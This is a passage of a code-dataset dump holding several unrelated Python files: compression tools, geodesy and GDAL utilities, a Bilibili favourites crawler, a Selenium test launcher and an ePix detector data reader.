\"+city+\" is \"+str(humidity)+\"%\"\n# this function gives the value of pressure in city \ndef pressureWeather(city):\n global pressure\n common(city)\n return \"The pressure in \"+city+\" is \"+str(pressure)+\" Atmospheric pressure.\"\n","sub_path":"weather_search.py","file_name":"weather_search.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175764582","text":"from trees import *\nfrom vl_codes import *\nfrom adaptive_arithmetic import adaptive_arithmetic_encode\nfrom adaptive_huffman import adaptive_huff\nfrom adaptive_arithmetic import alphabet as alph\nimport arithmetic \nfrom itertools import groupby\nfrom json import dump\nfrom sys import argv\n\n\ndef camzip(method, filename, max_char):\n \n with open(filename, 'rb') as fin:\n x = fin.read()\n\n alphabet = ''\n \n frequencies = dict([(key, len(list(group))) for key, group in groupby(sorted(x))])\n n = sum([frequencies[a] for a in frequencies])\n p = dict([(a,frequencies[a]/n) for a in frequencies])\n\n if (method == 'huffman') or (method == 'shannon_fano'):\n if (method == 'huffman'):\n xt = huffman(p)\n c = xtree2code(xt)\n else:\n c = shannon_fano(p)\n xt = code2xtree(c)\n\n y = vl_encode(x, c)\n outfile = filename + '.cz' + method[0]\n\n elif method == 'arithmetic':\n y = arithmetic.encode(x,p)\n outfile = filename + '.cz' + method[0]\n\n elif method == 'adaptive_huffman':\n alphabet = alph(x, max_char)\n y = adaptive_huff(x, alphabet)\n outfile = filename + '.cz' + 'f'\n\n elif method == 'adaptive_arithmetic':\n alphabet = alph(x, max_char)\n y = adaptive_arithmetic_encode(x, alphabet) \n outfile = filename + '.cz' + 'r'\n\n else:\n raise NameError('Compression method %s unknown' % method)\n \n y = bytes(bits2bytes(y))\n\n with open(outfile, 'wb') as fout:\n fout.write(y)\n\n pfile = filename + '.czp'\n n = len(x)\n\n with open(pfile, 'w') as fp:\n dump(frequencies, fp)\n\n return alphabet\n\n##if __name__ == \"__main__\":\n## if (len(argv) != 3):\n## print('Usage: python %s compression_method filename\\n' % argv[0])\n## print('Example: python %s huffman hamlet.txt' % argv[0])\n## print('or: python %s shannon_fano hamlet.txt' % argv[0])\n## print('or: python %s arithmetic hamlet.txt' % argv[0])\n## exit()\n##\n## camzip(argv[1], argv[2])\n","sub_path":"3F7 FTR Folder/camzip2.py","file_name":"camzip2.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590983900","text":"# Dataset\ndataset_name = 'traffic' # Dataset name\ndataset_path = 'datasets/traffic/input' # Dataset path\ngt_path = 'datasets/traffic/groundtruth' # Ground truth path\nresults_path = 'datasets/traffic/results'\n\n# Input Images\nnr_images = 100\nfirst_image = '000950' # Fist image filename\nimage_type = 'jpg' # Input image type\ngt_image_type = 'png' # Ground truth image type\nresult_image_type = 'png'\n\n# Background Modelling\nalpha = 3.7627\nrho = 0.1578\n\nmodelling_method = 'adaptive' # adaptive, non-adaptive\ncolor_images = True # Use RGB, HSV color channels\ncolor_space = \"RGB\" # RGB, HSV\nevaluate_foreground = True\nevaluate_alpha_range = [0, 25] # range of alpha values\nevaluate_alpha_values = 100 # number of alpha values to evaluate\nevaluate_rho_range = [0, 1] # range of rho values\nevaluate_rho_values = 20 # number of rho values to evaluate\nfind_best_parameters = False\nplot_back_model = False\n\n# Foreground Modelling\nfour_connectivity = False\nAUC_area_filtering = False\t\t # Plot AUC vs P pixels\nP_pixels_range = [0, 1000] # range of P pixels\nP_pixels_values = 40\n\ntask_name = 'task3' # else task1, task2\nopening_strel = 'diagonal'\nopening_strel_size = 10\nclosing_strel = 'diamond'\nclosing_strel_size = 10\narea_filtering = True\narea_filtering_P = 820\nshadow_remove = True\n\n# Save results\nsave_results = True # Save Log file\noutput_folder = 'results' # Output folder to save the results of the test\nsave_plots = True # Save the plots to disk\n","sub_path":"config/traffic_background.py","file_name":"traffic_background.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"47480258","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 11 20:09:58 2019\r\n\r\n@author: BIT1120172681\r\n\"\"\"\r\n\r\nFileNameOpen = r\"G:\\NamelessCotrunQuad_V1.0-master\\User\\new\\new.txt\"\r\nFileNameWrite = r\"G:\\NamelessCotrunQuad_V1.0-master\\User\\new\\new1.txt\"\r\n\r\nKeyStr = \"//\"\r\nFoundFlag = False\r\n\r\nFileObj = open(FileNameOpen, encoding='utf-8')\r\nFileWrite = open(FileNameWrite, \"w\")\r\n\r\nLineTemp = FileObj.readline()\r\n\r\nwhile LineTemp:\r\n if LineTemp.find(KeyStr) == 0:\r\n # print(LineTemp)\r\n FileWrite.write(LineTemp)\r\n LineTemp = FileObj.readline()\r\n else:\r\n LineTemp = FileObj.readline()\r\n \r\nFileObj.close()\r\nFileWrite.close()\r\n# input()\r\n","sub_path":"FileBatchProcessor/FileBatchProcessor_v1_0.py","file_name":"FileBatchProcessor_v1_0.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"575052763","text":"\"\"\"Geodesy-related utility functions.\"\"\"\n\n\nfrom osgeo import gdal\nimport numpy as np\nimport pickle\nimport os\n\ngdal.UseExceptions()\n\n\n# Top of the troposphere\nzref = 15000\n\n\ndef sind(x):\n \"\"\"Return the sine of x when x is in degrees.\"\"\"\n return np.sin(np.radians(x))\n\n\ndef cosd(x):\n \"\"\"Return the cosine of x when x is in degrees.\"\"\"\n return np.cos(np.radians(x))\n\n\ndef tand(x):\n \"\"\"Return degree tangent.\"\"\"\n return np.tan(np.radians(x))\n\n\ndef lla2ecef(lat, lon, height):\n import pyproj\n ecef = pyproj.Proj(proj='geocent')\n lla = pyproj.Proj(proj='latlong')\n\n return pyproj.transform(lla, ecef, lon, lat, height)\n\n\ndef ecef2lla(x, y, z):\n import pyproj\n ecef = pyproj.Proj(proj='geocent')\n lla = pyproj.Proj(proj='latlong')\n lon, lat, height = pyproj.transform(ecef, lla, x, y, z)\n return lat, lon, height\n\n\ndef enu2ecef(east, north, up, lat0, lon0, h0):\n \"\"\"Return ecef from enu coordinates.\"\"\"\n # I'm looking at\n # https://github.com/scivision/pymap3d/blob/master/pymap3d/__init__.py\n x0, y0, z0 = lla2ecef(lat0, lon0, h0)\n\n t = cosd(lat0) * up - sind(lat0) * north\n w = sind(lat0) * up + cosd(lat0) * north\n\n u = cosd(lon0) * t - sind(lon0) * east\n v = sind(lon0) * t + cosd(lon0) * east\n\n my_ecef = np.stack((x0 + u, y0 + v, z0 + w))\n\n return my_ecef\n\n\ndef lla2lambert(lat, lon, height=None):\n import pyproj\n lla = pyproj.Proj(proj='latlong')\n lambert = pyproj.Proj(\n '+proj=lcc +lat_1=30.0 +lat_2=60.0 +lat_0=18.500015 +lon_0=-100.2 '\n '+a=6370 +b=6370 +towgs84=0,0,0 +no_defs')\n\n if height is None:\n return lla(lat, lon, errcheck=True)\n return pyproj.transform(lla, lambert, lat, lon, height)\n\n\ndef state_to_los(t, x, y, z, vx, vy, vz, lats, lons, heights):\n import Geo2rdr\n\n real_shape = lats.shape\n lats = lats.flatten()\n lons = lons.flatten()\n heights = heights.flatten()\n\n geo2rdr_obj = Geo2rdr.PyGeo2rdr()\n geo2rdr_obj.set_orbit(t, x, y, z, vx, vy, vz)\n\n loss = np.zeros((3, len(lats)))\n slant_ranges = np.zeros_like(lats)\n\n for i, (lat, lon, height) in enumerate(zip(lats, lons, heights)):\n height_array = np.array(((height,),))\n\n # Geo2rdr is picky about the type of height\n height_array = height_array.astype(np.double)\n\n geo2rdr_obj.set_geo_coordinate(np.radians(lon),\n np.radians(lat),\n 1, 1,\n height_array)\n # compute the radar coordinate for each geo coordinate\n geo2rdr_obj.geo2rdr()\n\n # get back the line of sight unit vector\n los_x, los_y, los_z = geo2rdr_obj.get_los()\n loss[:, i] = los_x, los_y, los_z\n\n # get back the slant ranges\n slant_range = geo2rdr_obj.get_slant_range()\n slant_ranges[i] = slant_range\n\n los = loss * slant_ranges\n\n # Have to think about traversal order here. It's easy, though, since\n # in both orders xs come first, followed by all ys, followed by all\n # zs.\n return los.reshape((3,) + real_shape)\n\n\ndef toXYZ(lats, lons, hts):\n \"\"\"Convert lat, lon, geopotential height to x, y, z in ECEF.\"\"\"\n # Convert geopotential to geometric height. This comes straight from\n # TRAIN\n g0 = 9.80665\n # Map of g with latitude (I'm skeptical of this equation)\n g = 9.80616*(1 - 0.002637*cosd(2*lats) + 0.0000059*(cosd(2*lats))**2)\n Rmax = 6378137\n Rmin = 6356752\n Re = np.sqrt(1/(((cosd(lats)**2)/Rmax**2) + ((sind(lats)**2)/Rmin**2)))\n\n # Calculate Geometric Height, h\n h = (hts*Re)/(g/g0*Re - hts)\n return lla2ecef(lats, lons, h)\n\n\ndef big_and(*args):\n result = args[0]\n for a in args[1:]:\n result = np.logical_and(result, a)\n return result\n\n\ndef gdal_open(fname, returnProj = False):\n if os.path.exists(fname + '.vrt'):\n fname = fname + '.vrt'\n try:\n ds = gdal.Open(fname, gdal.GA_ReadOnly)\n except:\n raise RuntimeError('File {} could not be opened'.format(fname))\n proj = ds.GetProjection()\n\n val = []\n for band in range(ds.RasterCount):\n b = ds.GetRasterBand(band + 1) # gdal counts from 1, not 0\n d = b.ReadAsArray()\n try:\n ndv = b.GetNoDataValue()\n d[d==ndv]=np.nan\n except:\n print('NoDataValue attempt failed*******')\n pass\n val.append(d)\n b = None\n ds = None\n\n if len(val) > 1:\n data = np.stack(val)\n else:\n data = val[0]\n\n if not returnProj:\n return data\n else:\n return data, proj\n\n\ndef pickle_load(f):\n with open(f, 'rb') as fil:\n return pickle.load(fil)\n\ndef pickle_dump(o, f):\n with open(f, 'wb') as fil:\n pickle.dump(o, fil)\n\n\ndef writeArrayToRaster(array, filename, noDataValue = 0, fmt = 'ENVI', proj = None, gt = None):\n # write a numpy array to a GDAL-readable raster\n import gdal\n import numpy as np\n array_shp = np.shape(array)\n dType = array.dtype\n if 'complex' in str(dType):\n dType = gdal.GDT_CFloat32\n elif 'float' in str(dType):\n dType = gdal.GDT_Float32\n else:\n dType = gdal.GDT_Byte\n\n driver = gdal.GetDriverByName(fmt)\n ds = driver.Create(filename, array_shp[1], array_shp[0], 1, dType)\n if proj is not None:\n ds.SetProjection(proj)\n if gt is not None:\n ds.SetGeoTransform(gt)\n b1 = ds.GetRasterBand(1)\n b1.WriteArray(array)\n b1.SetNoDataValue(noDataValue)\n ds = None\n b1 = None\n\n\ndef writeArrayToFile(lats, lons, array, filename, noDataValue = -9999):\n '''\n Write a single-dim array of values to a file\n '''\n array[np.isnan(array)] = noDataValue\n with open(filename, 'w') as f:\n f.write('Lat,Lon,DEM_hgt_m\\n')\n for l, L, a in zip(lats, lons, array):\n f.write('{},{},{}\\n'.format(l, L, a))\n \n\ndef round_date(date, precision):\n import datetime\n # First try rounding up\n # Timedelta since the beginning of time\n datedelta = datetime.datetime.min - date\n # Round that timedelta to the specified precision\n rem = datedelta % precision\n # Add back to get date rounded up\n round_up = date + rem\n\n # Next try rounding down\n datedelta = date - datetime.datetime.min\n rem = datedelta % precision\n round_down = date - rem\n\n # It's not the most efficient to calculate both and then choose, but\n # it's clear, and performance isn't critical here.\n up_diff = round_up - date\n down_diff = date - round_down\n\n return round_up if up_diff < down_diff else round_down\n\n\ndef _least_nonzero(a):\n \"\"\"Fill in a flat array with the lowest nonzero value.\n \n Useful for interpolation below the bottom of the weather model.\n \"\"\"\n out = np.full(a.shape[:2], np.nan)\n xlim, ylim, zlim = np.shape(a)\n for x in range(xlim):\n for y in range(ylim):\n for z in range(zlim):\n val = a[x][y][z]\n if not np.isnan(val):\n out[x][y] = val\n break\n return out\n\n\ndef sind(x):\n \"\"\"Return the sine of x when x is in degrees.\"\"\"\n return np.sin(np.radians(x))\n\n\ndef cosd(x):\n \"\"\"Return the cosine of x when x is in degrees.\"\"\"\n return np.cos(np.radians(x))\n\n\ndef tand(x):\n \"\"\"Return degree tangent.\"\"\"\n return np.tan(np.radians(x))\n\n\ndef robmin(a):\n '''\n Get the minimum of an array, accounting for empty lists\n '''\n from numpy import nanmin as min\n try:\n return min(a)\n except ValueError:\n return 'N/A'\n\ndef robmax(a):\n '''\n Get the minimum of an array, accounting for empty lists\n '''\n from numpy import nanmax as max\n try:\n return max(a)\n except ValueError:\n return 'N/A'\n\n\ndef _get_g_ll(lats):\n '''\n Compute the variation in gravity constant with latitude\n '''\n #TODO: verify these constants. In particular why is the reference g different from self._g0?\n return 9.80616*(1 - 0.002637*cosd(2*lats) + 0.0000059*(cosd(2*lats))**2)\n\ndef _get_Re(lats):\n '''\n Returns the ellipsoid as a fcn of latitude\n '''\n #TODO: verify constants, add to base class constants? \n Rmax = 6378137\n Rmin = 6356752\n return np.sqrt(1/(((cosd(lats)**2)/Rmax**2) + ((sind(lats)**2)/Rmin**2)))\n\n\ndef _geo_to_ht(lats, hts, g0 = 9.80556):\n \"\"\"Convert geopotential height to altitude.\"\"\"\n # Convert geopotential to geometric height. This comes straight from\n # TRAIN\n # Map of g with latitude (I'm skeptical of this equation - Ray)\n g_ll = _get_g_ll(lats)\n Re = _get_Re(lats)\n\n # Calculate Geometric Height, h\n h = (hts*Re)/(g_ll/g0*Re - hts)\n\n return h\n\n\ndef padLower(invar):\n '''\n add a layer of data below the lowest current z-level at height zmin\n '''\n new_var = _least_nonzero(invar)\n return np.concatenate((new_var[:,:,np.newaxis], invar), axis =2)\n\n\ndef testArr(arr, thresh, ttype):\n '''\n Helper function for checking heights\n '''\n if ttype=='g':\n test = np.all(arr>thresh)\n elif ttype =='l':\n test = np.all(arr>> l = [1, 2, 3, 4]\n >>> list(chunked(l, 4))\n [[1], [2], [3], [4]]\n\n >>> l = [1, 2, 3]\n >>> list(chunked(l, 4))\n [[1], [2], [3], []]\n\n >>> l = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n >>> list(chunked(l, 4))\n [[1, 2, 3], [4, 5, 6], [7, 8, 9], [10]]\n\n \"\"\"\n import math\n chunksize = int(math.ceil(len(iterable) / n))\n return (iterable[i * chunksize:i * chunksize + chunksize]\n for i in range(n))\n\n\ndef makeDelayFileNames(time, los,outformat, weather_model_name, out):\n '''\n return names for the wet and hydrostatic delays\n '''\n str1 = time.isoformat() + \"_\" if time is not None else \"\"\n str2 = \"z\" if los is None else \"s\" \n str3 = 'td.{}'.format(outformat)\n hydroname, wetname = (\n '{}_{}_'.format(weather_model_name, dtyp) + str1 + str2 + str3\n for dtyp in ('hydro', 'wet'))\n\n hydro_file_name = os.path.join(out, hydroname)\n wet_file_name = os.path.join(out, wetname)\n return wet_file_name, hydro_file_name\n\n\ndef mkdir(dirName):\n try:\n os.mkdir(dirName)\n except FileExistsError: \n pass\n\ndef writeLL(time, lats, lons, llProj, weather_model_name, out):\n '''\n If the weather model grid nodes are used, write the lat/lon values\n out to a file\n '''\n from datetime import datetime as dt\n lonFileName = '{}_Lon_{}.dat'.format(weather_model_name, \n dt.strftime(time, '%Y_%m_%d_T%H_%M_%S'))\n latFileName = '{}_Lat_{}.dat'.format(weather_model_name, \n dt.strftime(time, '%Y_%m_%d_T%H_%M_%S'))\n\n mkdir('geom')\n\n writeArrayToRaster(lons, os.path.join(out, 'geom', lonFileName))\n writeArrayToRaster(lats, os.path.join(out, 'geom', latFileName))\n\n return latFileName, lonFileName\n\n\ndef checkShapes(los, lats, lons, hgts):\n '''\n Make sure that by the time the code reaches here, we have a\n consistent set of line-of-sight and position data. \n '''\n from utils.constants import Zenith\n test1 = hgts.shape == lats.shape == lons.shape\n try:\n test2 = los.shape[:-1] != hts.shape\n except:\n test2 = los is not Zenith\n\n if not test1 or test2:\n raise ValueError(\n 'I need lats, lons, heights, and los to all be the same shape. ' +\n 'lats had shape {}, lons had shape {}, '.format(lats.shape, lons.shape)+\n 'heights had shape {}, and los was not Zenith'.format(hts.shape))\n\n\ndef checkLOS(los, raytrace, Npts):\n '''\n Check that los is either: \n (1) Zenith,\n (2) a set of scalar values of the same size as the number \n of points, which represent the projection value), or\n (3) a set of vectors, same number as the number of points. \n '''\n from utils.constants import Zenith\n # los can either be a bunch of vectors or a bunch of scalars. If\n # raytrace, then it's vectors, otherwise scalars. (Or it's Zenith)\n if los is not Zenith:\n if raytrace:\n los = los.reshape(-1, 3)\n else:\n los = los.flatten()\n\n if los is not Zenith and los.shape[0] != Npts:\n raise RuntimeError('Found {} line-of-sight values and only {} points'\n .format(los.shape[0], Npts))\n return los\n\n\n\ndef readLLFromStationFile(fname):\n '''\n Helper fcn for checking argument compatibility\n '''\n try:\n import pandas as pd\n stats = pd.read_csv(fname)\n return stats['Lat'].values,stats['Lon'].values\n except:\n lats, lons = [], []\n with open(fname, 'r') as f:\n for i, line in enumerate(f): \n if i == 0:\n continue\n lat, lon = [float(f) for f in line.split(',')[1:3]]\n lats.append(lat)\n lons.append(lon)\n return lats, lons\n\n \ndef mangle_model_to_module(model_name):\n \"\"\"Turn an arbitrary string into a module name.\n\n Takes as input a model name, which hopefully looks like ERA-I, and\n converts it to a module name, which will look like erai. I doesn't\n always produce a valid module name, but that's not the goal. The\n goal is just to handle common cases.\n \"\"\"\n return 'models.' + model_name.lower().replace('-', '')\n\n\ndef gdal_trans(f1, f2, fmt = 'VRT'):\n '''\n translate a file from one location to another using GDAL\n '''\n ds1 = gdal.Open(f1)\n if ds1 is None:\n raise RuntimeError('Could not open the file {}'.format(f1))\n ds2 = gdal.Translate(f2, ds1, format = fmt)\n if ds2 is None:\n raise RuntimeError('Could not translate the file {} to {}'.format(f1, f2))\n ds1 = None\n ds2 = None\n\n\ndef isOutside(extent1, extent2):\n '''\n Determine whether any of extent1 lies outside extent2\n extent1/2 should be a list containing [lower_lat, upper_lat, left_lon, right_lon]\n '''\n t1 = extent1[0] < extent2[0]\n t2 = extent1[1] > extent2[1]\n t3 = extent1[2] < extent2[2]\n t4 = extent1[3] > extent2[3]\n if np.any([t1, t2, t3, t4]):\n return True\n return False\n\n\ndef getExtent(lats, lons=None):\n '''\n get the bounding box around a set of lats/lons\n '''\n if lons is None:\n ds = gdal.Open(lats, gdal.GA_ReadOnly)\n trans = ds.GetGeoTransform()\n # W E S N\n extent = [trans[0], trans[0] + ds.RasterXSize * trans[1],\n trans[3] + ds.RasterYSize*trans[5], trans[3]]\n if shrink is not None:\n delW, delE, delS, delN = shrink\n extent = [extent[0] + delW, extent[1] - delE, extent[2] + delS, extent[3] - delN]\n del ds\n return extent\n \n else:\n return [np.nanmin(lats), np.nanmax(lats), np.nanmin(lons), np.nanmax(lons)]\n\n\ndef setLLds(infile, latfile, lonfile):\n '''\n Use a lat/lon file to set the x/y coordinates of infile\n ''' \n from osgeo import gdal, osr\n ds = gdal.Open(infile, gdal.GA_ReadOnly)\n ds.SetMetadata({'X_DATASET': os.path.abspath(latfile), 'X_BAND': '1',\n 'Y_DATASET': os.path.abspath(lonfile), 'Y_BAND': '1'})\n\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(4326)\n ds.SetProjection(srs.ExportToWkt())\n del ds \n\n","sub_path":"tools/RAiDER/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":15648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225966315","text":"import requests\nimport json\nimport os\n\n\ndef crawling(uid,path_collect_data):\n os.chdir(path_collect_data)\n # 请求头\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n }\n\n # 第一次爬取: 获取所有收藏夹的id\n url = 'https://api.bilibili.com/x/v3/fav/folder/created/list-all'\n params = {\n 'up_mid': uid, # 写入自己账号的UID\n 'jsonp': 'jsonp',\n }\n response = requests.get(url=url, params=params, headers=headers)\n assign = response.json()\n with open('收藏夹id.json', 'w', encoding='utf-8')as fp:\n json.dump(assign, fp, ensure_ascii=False)\n print('收藏夹id爬取成功')\n\n # 第二次爬取: 获取收藏夹的json数据\n url = 'https://api.bilibili.com/x/v3/fav/resource/list'\n # 参数,还需要添加 pn 和 media_id 两个参数\n params = {\n 'ps': 20,\n 'keyword': '',\n 'order': 'mtime',\n 'type': 0,\n 'tid': 0,\n 'platform': 'web',\n 'jsonp': 'jsonp'\n }\n with open('收藏夹id.json', 'r', encoding='utf-8')as fp:\n file = json.load(fp)\n data = file['data']\n list = data['list']\n # 遍历所有的收藏夹\n for i in list:\n os.chdir(path_collect_data)\n path = i['title']\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n os.chdir(path)\n\n # 开始第二次爬取\n params['pn'] = 1\n while (params['pn'] < (i['media_count'] / 20 + 1)):\n with open(i['title'] + str(params['pn']) + '.json', 'w', encoding='utf-8')as f:\n print('爬取中: 当前爬取'+os.getcwd()+str(params['pn']))\n params['media_id'] = i['id']\n result = requests.get(url=url, params=params, headers=headers)\n assign = result.json()\n json.dump(assign, f, ensure_ascii=False)\n params['pn'] += 1\n print('收藏夹'+i['title']+'信息爬取完毕!')\n print('所有收藏夹爬取完毕!!!')\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499541211","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import NoAlertPresentException\nimport time, re\nfrom at_test_lib import * \nfrom datetime import datetime\n\nbrowser_driver = None\nglobal_browser = None\n\nimport unittest\n\t\t\t\t\t\t\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--browser', default='firefox',metavar='firefox',type=str,help='firefox/chrome/ie/opera/remote')\n\tparser.add_argument('--logroot', default=cur_dir()+'\\\\log\\\\',type=str,help='root of logfiles')\n\tparser.add_argument('--loglevel', default='info',type=str,help='debug/info/warning/error/critical')\n\tparser.add_argument('--pagetimeout', default=10,type=int,help='how long a page can load before considered timed-out')\n\tparser.add_argument('--base_url', default='www.autotrack.nl',type=str)\n\t\n\tparser.add_argument('--totalloops', type=int,default=1)\n\tparser.add_argument('--deeperloops', type=int,default=10)\n\tparser.add_argument('-v',action='store_true',help='unittest: Verbose output')\n\tparser.add_argument('-q',action='store_true',help='unittest: Quiet output')\n\tparser.add_argument('-f',action='store_true',help='unittest: Stop on first fail or error')\n\tparser.add_argument('-c',action='store_true',help='unittest: Catch ctrl-C and display results so far')\n\tparser.add_argument('-b',action='store_true',help='unittest: Buffer stdout and stderr during tests')\n\tparser.add_argument('-s',help=\"unittest: Directory to start discovery ('.' default)\")\n\tparser.add_argument('-p',help=\"unittest: Pattern to match tests ('test*.py' default)\")\n\tparser.add_argument('-t',help='unittest: Top level directory of project (defaults to start directory)')\n\tparser.add_argument('unittest_args', nargs='*')\n\t\t\t\t\t\t\n\targs = parser.parse_args()\n\n\t# TODO: Go do something with args\n\tlogroot = args.logroot\n\tglobal_browser = args.browser\n\tdeeperloops = args.deeperloops\n\ttotalloops = args.totalloops\n\tloglevel = logging.INFO\n\tif args.loglevel == 'critical' :\n\t\tloglevel = logging.CRITICAL\n\telif args.loglevel == 'error' :\n\t\tloglevel = logging.ERROR\n\telif args.loglevel == 'warning' :\n\t\tloglevel = logging.WARNING\t\t\n\telif args.loglevel == 'info' :\n\t\tloglevel = logging.INFO\n\telif args.loglevel == 'debug' :\n\t\tloglevel = logging.DEBUG\n\tlogging.getLogger().setLevel(loglevel)\n\t\t\n\ttry:\n\t\tpage_timeout = int(args.pagetimeout)\n\texcept:\n\t\tlogging_warning(\"pagetimeout in commandline is not numeric ('\"+args.pagetimeout+\"') setting to default 10\")\n\t\tpage_timeout = 10\n\tbase_url = 'http:////'+args.base_url\n\t\n\tunittest_arguments = []\n\tif args.v == True : unittest_arguments.append('-v')\n\tif args.q == True : unittest_arguments.append('-q') \n\tif args.f == True : unittest_arguments.append('-f')\n\tif args.c == True : unittest_arguments.append('-c')\n\tif args.b == True : unittest_arguments.append('-b')\n\tif args.s != None : \n\t\tunittest_arguments.append( '-s')\n\t\tunittest_arguments.append(args.s)\n\tif args.p != None : \n\t\tunittest_arguments.append( '-p')\n\t\tunittest_arguments.append(args.p)\n\tif args.t != None : \n\t\tunittest_arguments.append( '-t')\n\t\tunittest_arguments.append(args.t)\n\tfor arg in args.unittest_args:\n\t\tunittest_arguments.append(arg)\n\t\t\n\t# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)\n\tsys.argv[1:] = unittest_arguments\n\n\tsetconfig('logroot', args.logroot)\n\tsetconfig('global_browser', args.browser)\n\tsetconfig('deeperloops', args.deeperloops)\n\tsetconfig('totalloops', args.totalloops)\n\tsetconfig('page_timeout', int(args.pagetimeout))\n\tsetconfig('base_url', 'http:////'+args.base_url)\n\n\tprint('Browser : '+str(args.browser))\n\tprint('logroot : '+str(args.logroot))\n\tprint('loglevel : '+str(args.loglevel))\n\tprint('page timeout : '+str(args.pagetimeout))\n\tprint('base_url : '+str(args.base_url))\n\tprint('total loops : '+str(args.totalloops))\n\tprint('deeper loops : '+str(args.deeperloops))\n\n\tsearchstring = ''\n\tif len(sys.argv) >= 2:\n\t\tsearchstring=sys.argv[1]\n\tsuite = unittest.TestLoader().discover(cur_dir() + '\\\\tests', pattern='test_'+str(searchstring)+'*.py', top_level_dir=None)\n\tunittest.TextTestRunner(verbosity=2).run(suite)\n\t# unittest.main()\n\t\n","sub_path":"at_test.py","file_name":"at_test.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207517723","text":"#-----------------------------------------------------------------------------\n# Title : read images from file script\n#-----------------------------------------------------------------------------\n# File : read_image_from_file.py\n# Created : 2017-06-19\n# Last update: 2017-06-21\n#-----------------------------------------------------------------------------\n# Description:\n# Simple image viewer that enble a local feedback from data collected using\n# ePix cameras. The initial intent is to use it with stand alone systems\n#\n#-----------------------------------------------------------------------------\n# This file is part of the ePix rogue. It is subject to \n# the license terms in the LICENSE.txt file found in the top-level directory \n# of this distribution and at: \n# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. \n# No part of the ePix rogue, including this file, may be \n# copied, modified, propagated, or distributed except according to the terms \n# contained in the LICENSE.txt file.\n#-----------------------------------------------------------------------------\n\nimport os, sys, time\nimport numpy as np\n#import ePixViewer.Cameras as cameras\n#import ePixViewer.imgProcessing as imgPr\n# \nimport matplotlib \nmatplotlib.use('QT4Agg')\nimport matplotlib.pyplot as plt\nimport h5py\n\n#matplotlib.pyplot.ion()\nNUMBER_OF_PACKETS_PER_FRAME = 1\n#MAX_NUMBER_OF_FRAMES_PER_BATCH = 1500*NUMBER_OF_PACKETS_PER_FRAME\nMAX_NUMBER_OF_FRAMES_PER_BATCH = -1\n\n\n##################################################\n# Global variables\n##################################################\nPLOT_SET_HISTOGRAM = False\nPLOT_ADC_VS_N = True\n\n##################################################\n# Dark images\n##################################################\n#if (len(sys.argv[1])>0):\n# filename = sys.argv[1]\n#else:\n#filename = '/data/cryoData/backend/pulse_pseudoScope.dat'\nfilename = '/data/cryoData/coldMeasurements/singleChRamp.dat'\nfilename = '/data/cryoData/frontend/atest_pulser_test_analogMonitor_and_image.dat'\nfilename = '/data/cryoData/EXO_Lab/Full_Chain/Pulser_Linearity/Pulser_lin_Ch_0_8_3f_37_0x13ad_t3p6u_g3x0.dat'\nf = open(filename, mode = 'rb')\n\nfile_header = [0]\nnumberOfFrames = 0\npreviousSize = 0\nwhile ((len(file_header)>0) and ((numberOfFrames>24)==2: #image packet only, 2 mean scope data\n if (numberOfFrames == 0):\n allFrames = [newPayload.copy()]\n else:\n newFrame = [newPayload.copy()]\n allFrames = np.append(allFrames, newFrame, axis = 0)\n numberOfFrames = numberOfFrames + 1 \n previousSize = file_header\n \n if (numberOfFrames%5000==0):\n print(\"Read %d frames\" % numberOfFrames)\n\n except Exception: \n e = sys.exc_info()[0]\n #print (\"Message\\n\", e)\n print(\"End of file.\")\n print ('size', file_header, 'previous size', previousSize)\n print(\"numberOfFrames read: \" ,numberOfFrames)\n\n\n\n##################################################\n#from here on we have a set of traces to work with\n##################################################\nnp.savetxt(os.path.splitext(filename)[0] + \"_traces\" + \".csv\", allFrames, fmt='%d', delimiter=',', newline='\\n')\n\n#%%\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(allFrames[1,20:-20])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFrames[:, 20:-20]))\n plt.title('ADC value - all traces')\n plt.show()\n\n \n\n#%%\ntestSignal = allFrames[1]\nprint(testSignal[20:30])\nvhex = np.vectorize(hex)\nprint(vhex(testSignal[20:30]))\nLSBArray = np.bitwise_and(testSignal,255)\nMSBArray = np.bitwise_and(testSignal,65280)\n#print(vhex(LSBArray[20:30]))\n#print(vhex(MSBArray[20:30]))\nnewSignal = MSBArray[0:-1] + LSBArray[1:]\nnewSignal2 = MSBArray[1:] + LSBArray[0:-1]\ndifSignal = testSignal[:-1] - newSignal\nprint(vhex(newSignal[20:30]))\n\nif PLOT_ADC_VS_N :\n plt.figure(2)\n plt.subplot(311)\n plt.title('ADC value - single trace')\n plt.plot(testSignal[20:-20])\n\n plt.subplot(312)\n plt.plot(np.transpose(newSignal[20:-20]))\n plt.title('ADC value - all traces')\n\n plt.subplot(313)\n 